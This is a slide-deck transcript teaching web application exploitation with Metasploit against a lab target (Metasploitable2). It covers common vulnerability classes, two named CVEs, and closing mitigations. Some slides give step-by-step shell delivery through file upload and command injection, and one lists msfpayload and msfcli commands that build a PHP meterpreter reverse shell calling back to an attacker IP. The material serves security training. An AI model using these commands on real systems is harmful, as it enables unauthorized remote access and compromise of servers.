dennis maldonado @dennismald. application security specialist whitehat security full-time student...
TRANSCRIPT
![Page 1: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/1.jpg)
Introduction to Metasploit:
Exploiting Web Applications
Dennis Maldonado@DennisMald
![Page 2: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/2.jpg)
Dennis Maldonado
Application Security Specialist WhiteHat Security
Full-Time Student University of Houston – Main Campus ▪ Computer Information Systems Major
Twitter @DennisMald
Website / Blog KernelMeltdown.org
![Page 3: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/3.jpg)
Tools
Kali Linux – Our attacker machine
Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.
Metasploitable2 – Victim Web Server
![Page 4: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/4.jpg)
Topic of the dayExploiting the backend server through a web application.
![Page 5: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/5.jpg)
What’s the problem?
Reasons why hackers want to compromise the server: Run attacks against the internal network Use the server as a bot Install backdoors onto the server Reveal sensitive files/passwords Execute any local file Execute remote files and more…
![Page 6: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/6.jpg)
What’s the problem?
Vulnerabilities that are dangerous against a server Directory Traversal Local File Inclusion Remote File Inclusion Remote Code Execution SQL Injection Command Injection
![Page 7: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/7.jpg)
Directory Traversal
http://website.com/?page=index.php
![Page 8: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/8.jpg)
Local File Inclusion
http://website.com/?page=index.php
![Page 9: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/9.jpg)
Remote File Inclusion
http://website.com/?page=index.php
![Page 10: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/10.jpg)
Remote Code Execution
http://website.com/
![Page 11: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/11.jpg)
SQL Injection
http://website.com/user.php?id=1&Submit=Submit#
![Page 12: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/12.jpg)
Command Injection
![Page 13: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/13.jpg)
Metasploit Basics
![Page 14: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/14.jpg)
The Metasploit Project
Metasploit is an open-source framework used for Security development and testing Information gathering and fingerprinting Exploitation/Penetration testing Payload generation and encoding Fuzzing And much more…
![Page 15: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/15.jpg)
Metasploit Interfaces
Command Line Interfaces msfconsole msfcli
GUI Interfaces Metasploit Community Edition Armitage
![Page 16: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/16.jpg)
Metasploit Modules
Modules Exploit – Exploitation/Proof-of-Concept code▪ Ruby on Rails exploit▪ PHP-CGI exploit
Auxiliary – Misc. modules for multiple purposes▪ Scanners▪ DDOS tools▪ Fingerprinting▪ Clients
Payloads – Code to be executed on the exploited system▪ System Shells▪ Meterpreter Shells
Post – Modules for post-exploitation tasks▪ Persistence▪ Password Stealing▪ Pivoting
![Page 17: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/17.jpg)
Exploits
Active Exploits Actively exploit a host. Ex: Ruby on Rails XML exploit
Passive Exploits Wait’s for incoming hosts, then exploits
them Ex: Java 0-days
Exploits contain payloads
![Page 18: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/18.jpg)
Payloads
Inline (Non Staged) Payload containing the exploit and shell code Stable Large size
Staged Exploits victim, establishes connection with
attacker, pulls down the payload Meterpreter
Advanced, dynamic payload. Extended over the network Extensible through modules and plugins
![Page 19: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/19.jpg)
Payloads continued
Types of connections Bind▪ Local server gets started on victim machine▪ Attacker connects to victim▪ windows/x64/shell/bind_tcp
Reverse▪ Local server gets started on attacker machine▪ Victim connects to attacker▪ windows/x64/shell/reverse_tcp
![Page 20: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/20.jpg)
Vulnerabilities and Exploit Examples
![Page 21: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/21.jpg)
PHP-CGI Argument Injection
CVE 2012-1823 DOS attack▪ -T 10000
Source code disclosure▪ -s argument
Remote Code Execution▪ -d argument
![Page 22: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/22.jpg)
Ruby on Rails XML Parameter Parsing Vulnerability
CVE-2013-0156 Easy to find, easy to
exploit, critical vulnerability.
Requires just one POST request containing a specially crafted XML data.
Send commands through YAML objects
![Page 23: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/23.jpg)
Unrestricted File Upload
The upload functionality allows for any file type to be uploaded1. Upload server-side code and check if it
executes▪ PHP = <?php echo “Hello World!”; ?>▪ ASP = <% Response.Write "Hello World!" %>▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell3. Use msfcli to listen for a connection from the
victim4. Upload the shell and execute it
![Page 24: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/24.jpg)
Command Injection
Allows an attacker to execute system level commands.1. Attempt a safe command
1. echo test2. uname -a
2. Use msfpayload to create a shell3. Use msfcli to listen for a connection from
the victim4. Inject curl or wget commands to download
the shell onto the victim machine.5. Chmod if necessary and execute
![Page 25: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/25.jpg)
Commands used(Note, IP addresses and ports may be different)
msfpayload php/meterpreter/reverse_tcp O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3 LPORT=1337 R > shell.php
# Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file.
==================================
msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost=10.211.55.3 lport=1337 E
![Page 26: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/26.jpg)
Mitigations and Closing
![Page 27: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/27.jpg)
Mitigations
Keep software up to date! PHP: 5.4.3, 5.3.13 Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15
Use whitelisting for file upload extensions Watch for extensions and content-types Don’t let upload directory be executable Rename files if possible
Don’t pass user input as a system command! Use library calls when possible Sanitize input
![Page 28: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/28.jpg)
Questions? Comments?
![Page 29: Dennis Maldonado @DennisMald. Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer](https://reader034.vdocuments.net/reader034/viewer/2022042702/56649dc85503460f94abd982/html5/thumbnails/29.jpg)
Sources
BackTrack-Linux http://www.kali.org/
The Metasploit Project http://www.metasploit.com/
Metasploit Unleashed http://www.offensive-security.com/metasploit-unleashed/
PHP-CGI Advisory http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
Ruby on Rails Exploitation https://
community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156
Damn Vulnerable Web Application (DVWA) http://www.dvwa.co.uk/
Metasploitable 2 http://
information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web